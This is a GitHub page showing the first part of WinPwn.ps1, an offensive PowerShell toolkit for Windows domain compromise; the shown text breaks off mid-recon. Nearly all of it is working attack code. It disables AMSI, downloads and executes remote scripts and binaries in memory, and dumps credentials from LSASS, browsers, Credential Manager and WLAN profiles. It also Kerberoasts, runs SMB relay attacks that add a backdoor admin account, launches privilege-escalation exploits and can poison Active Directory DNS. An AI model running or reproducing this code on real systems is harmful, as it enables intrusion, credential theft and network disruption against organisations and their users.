-
-
Notifications
You must be signed in to change notification settings - Fork 504
/
WinPwn.ps1
1650 lines (1462 loc) · 93.7 KB
/
WinPwn.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#Zipping Function
Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip
{
param([string]$zipfile, [string]$outpath)
[System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}
function AmsiBypass
{
<#
.DESCRIPTION
Amsi bypass by https://github.com/rasta-mouse/AmsiScanBufferBypass
License: BSD 3-Clause
#>
#Privilege Escalation Phase
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1')
}
function dependencychecks
{
<#
.DESCRIPTION
Checks for System Role, Powershell Version, Proxy active/not active, Elevated or non elevated Session.
Creates the Log directories or checks if they are already available.
Author: @securethisshit
License: BSD 3-Clause
#>
#Privilege Escalation Phase
[int]$systemRoleID = $(get-wmiObject -Class Win32_ComputerSystem).DomainRole
$systemRoles = @{
0 = " Standalone Workstation " ;
1 = " Member Workstation " ;
2 = " Standalone Server " ;
3 = " Member Server " ;
4 = " Backup Domain Controller " ;
5 = " Primary Domain Controller "
}
#Proxy Detect #1
proxydetect
pathcheck
$PSVersion=$PSVersionTable.PSVersion.Major
write-host "[?] Checking for Default PowerShell version ..`n" -ForegroundColor black -BackgroundColor white ; sleep 1
if($PSVersion -lt 2){
Write-Warning "[!] You have PowerShell v1.0.`n"
Write-Warning "[!] This script only supports Powershell verion 2 or above.`n"
exit
}
write-host " [+] -----> PowerShell v$PSVersion`n" ; sleep 1
write-host "[?] Detecting system role ..`n" -ForegroundColor black -BackgroundColor white ; sleep 1
$systemRoleID = $(get-wmiObject -Class Win32_ComputerSystem).DomainRole
if($systemRoleID -ne 1){
" [-] Some features in this script need access to the domain. They can only be run on a domain member machine. Pwn some domain machine for them!`n"
Read-Host "Type any key to continue .."
}
write-host " [+] ----->",$systemRoles[[int]$systemRoleID],"`n" ; sleep 1
}
function pathCheck
{
<#
.DESCRIPTION
Checks for correct path dependencies.
Author: @securethisshit
License: BSD 3-Clause
#>
#Dependency Check
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
Write-Host -ForegroundColor Yellow 'Creating/Checking Log Folders in '$currentPath' directory:'
if(!(Test-Path -Path $currentPath\LocalRecon\)){mkdir $currentPath\LocalRecon\}
if(!(Test-Path -Path $currentPath\DomainRecon\)){mkdir $currentPath\DomainRecon\;mkdir $currentPath\DomainRecon\ADrecon}
if(!(Test-Path -Path $currentPath\LocalPrivEsc\)){mkdir $currentPath\LocalPrivEsc\}
if(!(Test-Path -Path $currentPath\Exploitation\)){mkdir $currentPath\Exploitation\}
if(!(Test-Path -Path $currentPath\Vulnerabilities\)){mkdir $currentPath\Vulnerabilities\}
if(!(Test-Path -Path $currentPath\LocalPrivEsc\)){mkdir $currentPath\LocalPrivEsc\}
}
function sharpcradle{
<#
.DESCRIPTION
Download .NET Binary to RAM.
Author: @securethisshit
License: BSD 3-Clause
#>
Param
(
[bool]
$allthosedotnet,
[bool]
$polar,
[string]
$url,
[string]
$argument1,
[string]
$argument2,
[string]
$argument3
)
pathcheck
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
if ($allthosedotnet)
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
Write-Host -ForegroundColor Yellow 'Executing Seatbelt. Output goes to .\LocalRecon\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Seatbelt.exe -argument1 all >> $currentPath\LocalRecon\SeatBeltOutput.txt
Write-Host -ForegroundColor Yellow 'Doing Kerberoasting + ASRepRoasting. Output goes to .\Exploitation\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Rubeus.exe -argument1 asreproast -argument2 "/format:hashcat" >> $currentPath\Exploitation\ASreproasting.txt
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Rubeus.exe -argument1 kerberoast -argument2 "/format:hashcat" >> $currentPath\Exploitation\Kerberoasting_Rubeus.txt
Write-Host -ForegroundColor Yellow 'Checking for vulns using Watson. Output goes to .\Vulnerabilities\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Watson.exe >> $currentPath\Vulnerabilities\Privilege_Escalation_Vulns.txt
Write-Host -ForegroundColor Yellow 'Getting all theese Browser Creds using Sharpweb. Output goes to .\Exploitation\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/SharpWeb.exe -argument1 all >> $currentPath\Exploitation\Browsercredentials.txt
Write-Host -ForegroundColor Yellow 'Searching for Privesc vulns. Output goes to .\Vulnerabilities\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/SharpUp.exe >> $currentPath\Vulnerabilities\Privilege_Escalation_Vulns_SharpUp.txt
if (isadmin)
{
Write-Host -ForegroundColor Yellow 'Searching for Privesc vulns. Output goes to .\Vulnerabilities\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/SharpUp.exe -argument1 audit >> $currentPath\Vulnerabilities\Privilege_Escalation_Vulns_SharpUp.txt
Write-Host -ForegroundColor Yellow 'Safetykatz ftw. Output goes to .\Exploitation\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/SafetyKatz.exe >> $currentPath\Exploitation\SafetyCreds.txt
}
If((Get-Content .\Vulnerabilities\Privilege_Escalation_Vulns.txt) -match "CVE-2019-0841 : VULNERABLE")
{
if(!(Test-Path -Path C:\temp\)){mkdir C:\temp}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-Webrequest -Uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/nc.exe -Outfile C:\temp\nc.exe
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/privesc.exe -argument1 license.rtf
Start-Sleep -Seconds 3
cmd /c start powershell -Command {C:\temp\nc.exe 127.0.0.1 2000}
}
}
if ($polar)
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
$polaraction = Read-Host -Prompt 'Do you have a valid username and password for CVE-2019-1069?'
if ($polaraction -eq "yes" -or $polaraction -eq "y" -or $polaraction -eq "Yes" -or $polaraction -eq "Y")
{
$username = Read-Host -Prompt 'Please enter the username'
$password = Read-Host -Prompt 'Please enter the password'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-Webrequest -Uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/schedsvc.dll -Outfile $currentPath\schedsvc.dll
Invoke-Webrequest -Uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/schtasks.exe -Outfile $currentPath\schtasks.exe
Invoke-Webrequest -Uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/test.job -Outfile $currentPath\test.job
if ([Environment]::Is64BitProcess)
{
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpPolarbear.exe -argument1 license.rtf $username $password
Start-Sleep -Seconds 1.5
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpPolarbear.exe -argument1 license.rtf $username $password
}
else
{
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpPolarbearx86.exe -argument1 license.rtf $username $password
Start-Sleep -Seconds 1.5
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpPolarbearx86.exe -argument1 license.rtf $username $password
}
move env:USERPROFILE\Appdata\Local\temp\license.rtf C:\windows\system32\license.rtf
del .\schedsvc.dll
del .\schtasks.exe
del C:\windows\system32\tasks\test
}
else
{
$system = Read-Host -Prompt 'You can also try to elevate privileges using the last sandboxescaper vuln (ByeBear). Lets do it? (y/n)'
if ($system -eq "no" -or $system -eq "n" -or $system -eq "No" -or $system -eq "N")
{
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
Write-Host 'Next Try..'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
}
}
}
else
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
if ($url)
{
if ($argument1)
{
if ($argument2)
{
if($argument3)
{
Invoke-Sharpcradle -uri $url -argument1 $argument1 -argument2 $argument2 -argument3 $argument3
}
else{Invoke-Sharpcradle -uri $url -argument1 $argument1 -argument2 $argument2}
}
else{Invoke-Sharpcradle -uri $url -argument1 $argument1}
}
else
{
$arg = Read-Host -Prompt 'Do you need to set custom parameters / arguments for the executable?'
if ($arg -eq "yes" -or $arg -eq "y" -or $arg -eq "Yes" -or $arg -eq "Y")
{
$argument1 = Read-Host -Prompt 'Enter argument1 for the executable file:'
$arg1 = Read-Host -Prompt 'Do you need more arguments for the executable?'
if ($arg1 -eq "yes" -or $arg1 -eq "y" -or $arg1 -eq "Yes" -or $arg1 -eq "Y")
{
$argument2 = Read-Host -Prompt 'Enter argument2 for the executable file:'
Invoke-Sharpcradle -uri $url -argument1 $argument1 -argument2 $argument2
}
else{Invoke-Sharpcradle -uri $url -argument1 $argument1}
}
else
{
Invoke-Sharpcradle -Uri $url
}
}
}
else
{
$url = Read-Host -Prompt 'Please Enter an URL to a downloadable C# Binary to run in memory, for example https://github.com/SecureThisShit/Creds/raw/master/pwned_x64/notepad.exe'
$arg = Read-Host -Prompt 'Do you need to set custom parameters / arguments for the executable?'
if ($arg -eq "yes" -or $arg -eq "y" -or $arg -eq "Yes" -or $arg -eq "Y")
{
$argument1 = Read-Host -Prompt 'Enter argument1 for the executable file:'
$arg1 = Read-Host -Prompt 'Do you need more arguments for the executable?'
if ($arg1 -eq "yes" -or $arg1 -eq "y" -or $arg1 -eq "Yes" -or $arg1 -eq "Y")
{
$argument2 = Read-Host -Prompt 'Enter argument2 for the executable file:'
Invoke-Sharpcradle -uri $url -argument1 $argument1 -argument2 $argument2
}
else{Invoke-Sharpcradle -uri $url -argument1 $argument1}
}
else
{
Invoke-Sharpcradle -Uri $url
}
}
}
}
function isadmin
{
# Check if Elevated
$isAdmin = ([System.Security.Principal.WindowsPrincipal][System.Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
return $isAdmin
}
function Inveigh {
<#
.DESCRIPTION
Starts Inveigh in a parallel window.
Author: @securethisshit
License: BSD 3-Clause
#>
pathcheck
$currentip = Get-currentIP
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
$relayattacks = Read-Host -Prompt 'Do you want to execute SMB-Relay attacks? (yes/no)'
if ($relayattacks -eq "yes" -or $relayattacks -eq "y" -or $relayattacks -eq "Yes" -or $relayattacks -eq "Y")
{
Write-Host 'Starting WinPwn in a new window so that you can use this one for Invoke-TheHash'
invoke-expression 'cmd /c start powershell -Command {$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;IEX(New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn.ps1'');WinPwn;}'
$target = Read-Host -Prompt 'Please Enter an IP-Adress as target for the relay attacks'
$admingroup = Read-Host -Prompt 'Please Enter the name of your local administrators group: (varies for different countries)'
$Wcl = new-object System.Net.WebClient
$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Inveigh-Relay.ps1")
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Invoke-SMBClient.ps1")
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Invoke-SMBEnum.ps1")
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Invoke-SMBExec.ps1")
Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target $target -Command "net user pwned 0WnedAccount! /add; net localgroup $admingroup pwned /add" -Attack Enumerate,Execute,Session
Write-Host 'You can now check your sessions with Get-Inveigh -Session and use Invoke-SMBClient, Invoke-SMBEnum and Invoke-SMBExec for further recon/exploitation'
}
$adidns = Read-Host -Prompt 'Do you want to start Inveigh with Active Directory-Integrated DNS dynamic Update attack? (yes/no)'
if ($adidns -eq "yes" -or $adidns -eq "y" -or $adidns -eq "Yes" -or $adidns -eq "Y")
{
if (isadmin)
{
cmd /c start powershell -Command {$IPaddress = Get-NetIPConfiguration | Where-Object {$_.IPv4DefaultGateway -ne $null -and $_.NetAdapter.Status -ne "Disconnected"};$currentPath = (Get-Item -Path ".\" -Verbose).FullName;$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1');IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -ADIDNS Combo -ADIDNSThreshold 2 -IP $IPaddress.IPv4Address.IPAddress -FileOutput Y -FileOutputDirectory $currentPath\;}
}
else
{
cmd /c start powershell -Command {$IPaddress = Get-NetIPConfiguration | Where-Object {$_.IPv4DefaultGateway -ne $null -and $_.NetAdapter.Status -ne "Disconnected"};$currentPath = (Get-Item -Path ".\" -Verbose).FullName;$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1');IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -ADIDNS Combo -ADIDNSThreshold 2 -IP $IPaddress.IPv4Address.IPAddress -FileOutput Y -FileOutputDirectory $currentPath\;}
}
}
else
{
if (isadmin)
{
cmd /c start powershell -Command {$IPaddress = Get-NetIPConfiguration | Where-Object {$_.IPv4DefaultGateway -ne $null -and $_.NetAdapter.Status -ne "Disconnected"};$currentPath = (Get-Item -Path ".\" -Verbose).FullName;$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1');IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP $IPaddress.IPv4Address.IPAddress -FileOutput Y -FileOutputDirectory $currentPath\;}
}
else
{
cmd /c start powershell -Command {$IPaddress = Get-NetIPConfiguration | Where-Object {$_.IPv4DefaultGateway -ne $null -and $_.NetAdapter.Status -ne "Disconnected"};$currentPath = (Get-Item -Path ".\" -Verbose).FullName;$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1');IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -FileOutput Y -IP $IPaddress.IPv4Address.IPAddress -FileOutputDirectory $currentPath\;}
}
}
}
function adidnswildcard
{
<#
.DESCRIPTION
Starts Inveigh in a parallel window.
Author: @securethisshit
License: BSD 3-Clause
#>
pathcheck
$adidns = Read-Host -Prompt 'Are you REALLY sure, that you want to create a Active Directory-Integrated DNS Wildcard record? This can in the worst case cause network disruptions for all clients and servers for the next hours! (yes/no)'
if ($adidns -eq "yes" -or $adidns -eq "y" -or $adidns -eq "Yes" -or $adidns -eq "Y")
{
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Powermad.ps1")
New-ADIDNSNode -Node * -Tombstone -Verbose
Write-Host -ForegroundColor Red 'Be sure to remove the record with `Disable-ADIDNSNode -Node * -Verbose` at the end of your tests'
Write-Host -ForegroundColor Yellow 'Starting Inveigh to capture all theese mass hashes:'
Inveigh
}
}
function sessionGopher
{
<#
.DESCRIPTION
Starts SessionGopher to search for Cached Credentials.
Author: @securethisshit
License: BSD 3-Clause
#>
pathcheck
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/segoph.ps1')
$whole_domain = Read-Host -Prompt 'Do you want to start SessionGopher search over the whole domain? (yes/no) - takes a lot of time'
if ($whole_domain -eq "yes" -or $whole_domain -eq "y" -or $whole_domain -eq "Yes" -or $whole_domain -eq "Y")
{
$session = Read-Host -Prompt 'Do you want to start SessionGopher with thorough tests? (yes/no) - takes a fuckin lot of time'
if ($session -eq "yes" -or $session -eq "y" -or $session -eq "Yes" -or $session -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Starting Local SessionGopher, output is generated in '$currentPath'\LocalRecon\SessionGopher.txt:'
cachet -hdPXEKUQjxCYg9C -qMELeoMyJPUTJQY >> $currentPath\LocalRecon\SessionGopher.txt -Outfile
}
else
{
Write-Host -ForegroundColor Yellow 'Starting SessionGopher without thorough tests, output is generated in '$currentPath'\LocalRecon\SessionGopher.txt:'
cachet -qMELeoMyJPUTJQY >> $currentPath\LocalRecon\SessionGopher.txt
}
}
else
{
$session = Read-Host -Prompt 'Do you want to start SessionGopher with thorough tests? (yes/no) - takes a lot of time'
if ($session -eq "yes" -or $session -eq "y" -or $session -eq "Yes" -or $session -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Starting Local SessionGopher, output is generated in '$currentPath'\LocalRecon\SessionGopher.txt:'
cachet -hdPXEKUQjxCYg9C >> $currentPath\LocalRecon\SessionGopher.txt -Outfile
}
else
{
Write-Host -ForegroundColor Yellow 'Starting SessionGopher without thorough tests,output is generated in '$currentPath'\LocalRecon\SessionGopher.txt:'
cachet >> $currentPath\LocalRecon\SessionGopher.txt
}
}
}
function kittielocal
{
<#
.DESCRIPTION
Dumps Credentials from Memory / SAM Database.
Author: @securethisshit
License: BSD 3-Clause
#>
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
pathcheck
AmsiBypass
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/obfuskittie.ps1')
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/DumpWCM.ps1')
if (isadmin)
{
$safety = Read-Host -Prompt 'Execute safetykatz instead of invoke-kittie in memory? (recommended) (yes/no)'
if ($safety -eq "yes" -or $safety -eq "y" -or $safety -eq "Yes" -or $safety -eq "Y")
{
Invoke-WCMDump >> $currentPath\Exploitation\WCMCredentials.txt
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
$lsass = Read-Host -Prompt 'Only dump lsass without using the cat (more stealth)? (recommended) (yes/no)'
if ($lsass -eq "yes" -or $lsass -eq "y" -or $lsass -eq "Yes" -or $lsass -eq "Y")
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/SafetyDump.ps1')
Write-Host -ForegroundColor Yellow 'Dumping lsass to C:\windows\temp\debug.bin :'
Safetydump
}
else{Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/SafetyKatz.exe?raw=true}
}
else
{
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/mimi.ps1')
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-WLAN-Keys.ps1')
Write-Host -ForegroundColor Yellow 'Dumping Windows Credential Manager:'
Invoke-WCMDump >> $currentPath\Exploitation\WCMCredentials.txt
$output_file = Read-Host -Prompt 'Save credentials to a local text file? (yes/no)'
if ($output_file -eq "yes" -or $output_file -eq "y" -or $output_file -eq "Yes" -or $output_file -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Dumping Credentials from lsass.exe:'
Invoke-Mimikatz >> $currentPath\Exploitation\Credentials.txt
Get-WLAN-Keys >> $currentPath\Exploitation\WIFI_Keys.txt
}
else
{
Invoke-Mimikatz
Get-WLAN-Keys
}
}
}
else
{
Write-Host -ForegroundColor Yellow 'You need local admin rights for this, only dumping Credential Manager now!'
Write-Host -ForegroundColor Yellow 'Dumping Windows Credential Manager:'
Invoke-WCMDump >> $currentPath\Exploitation\WCMCredentials.txt
Write-Host -ForegroundColor Yellow 'Running the small kittie:'
inbox >> $currentPath\Exploitation\kittenz.txt
}
}
function localreconmodules
{
<#
.DESCRIPTION
All local recon scripts are executed here.
Author: @securethisshit
License: BSD 3-Clause
#>
#Local Reconning
pathcheck
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-ComputerDetails.ps1')
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/view.ps1')
Write-Host -ForegroundColor Yellow 'Starting local Recon phase:'
Write-Host -ForegroundColor Yellow 'Parsing Event logs for sensitive Information:'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri 'https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/EventLogParser.exe' -Outfile "$currentPath\EventLogParser.exe"
.\EventLogParser.exe eventid=4103 outfile="$currentPath\LocalRecon\EventlogSensitiveInformations.txt"
.\EventLogParser.exe eventid=4104 outfile="$currentPath\LocalRecon\EventlogSensitiveInformations.txt"
if (isadmin){.\EventLogParser.exe eventid=4688 outfile="$currentPath\LocalRecon\EventlogSensitiveInformations.txt"}
#Check for WSUS Updates over HTTP
Write-Host -ForegroundColor Yellow 'Checking for WSUS over http'
$UseWUServer = (Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" -Name UseWUServer -ErrorAction SilentlyContinue).UseWUServer
$WUServer = (Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" -Name WUServer -ErrorAction SilentlyContinue).WUServer
if($UseWUServer -eq 1 -and $WUServer.ToLower().StartsWith("http://"))
{
Write-Host -ForegroundColor Yellow 'WSUS Server over HTTP detected, most likely all hosts in this domain can get fake-Updates!'
echo "Wsus over http detected! Fake Updates can be delivered here. $UseWUServer / $WUServer " >> "$currentPath\Vulnerabilities\WsusoverHTTP.txt"
}
#Check for SMB Signing
Write-Host -ForegroundColor Yellow 'Check SMB-Signing for the local system'
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Invoke-SMBNegotiate.ps1')
Invoke-SMBNegotiate -ComputerName localhost >> "$currentPath\Vulnerabilities\SMBSigningState.txt"
#Collecting Informations
Write-Host -ForegroundColor Yellow 'Collecting local system Informations for later lookup, saving them to .\LocalRecon\'
systeminfo >> "$currentPath\LocalRecon\systeminfo.txt"
Write-Host -ForegroundColor Yellow 'Getting Patches'
wmic qfe >> "$currentPath\LocalRecon\Patches.txt"
wmic os get osarchitecture >> "$currentPath\LocalRecon\Architecture.txt"
Write-Host -ForegroundColor Yellow 'Getting environment variables'
Get-ChildItem Env: | ft Key,Value >> "$currentPath\LocalRecon\Environmentvariables.txt"
Write-Host -ForegroundColor Yellow 'Getting connected drives'
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root >> "$currentPath\LocalRecon\Drives.txt"
Write-Host -ForegroundColor Yellow 'Getting current user Privileges'
whoami /priv >> "$currentPath\LocalRecon\Privileges.txt"
Get-LocalUser | ft Name,Enabled,LastLogon >> "$currentPath\LocalRecon\LocalUsers.txt"
Write-Host -ForegroundColor Yellow 'Getting local Accounts/Users + Password policy'
net accounts >> "$currentPath\LocalRecon\PasswordPolicy.txt"
Get-LocalGroup | ft Name >> "$currentPath\LocalRecon\LocalGroups.txt"
Write-Host -ForegroundColor Yellow 'Getting network interfaces, route information, Arp table'
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address >> "$currentPath\LocalRecon\Networkinterfaces.txt"
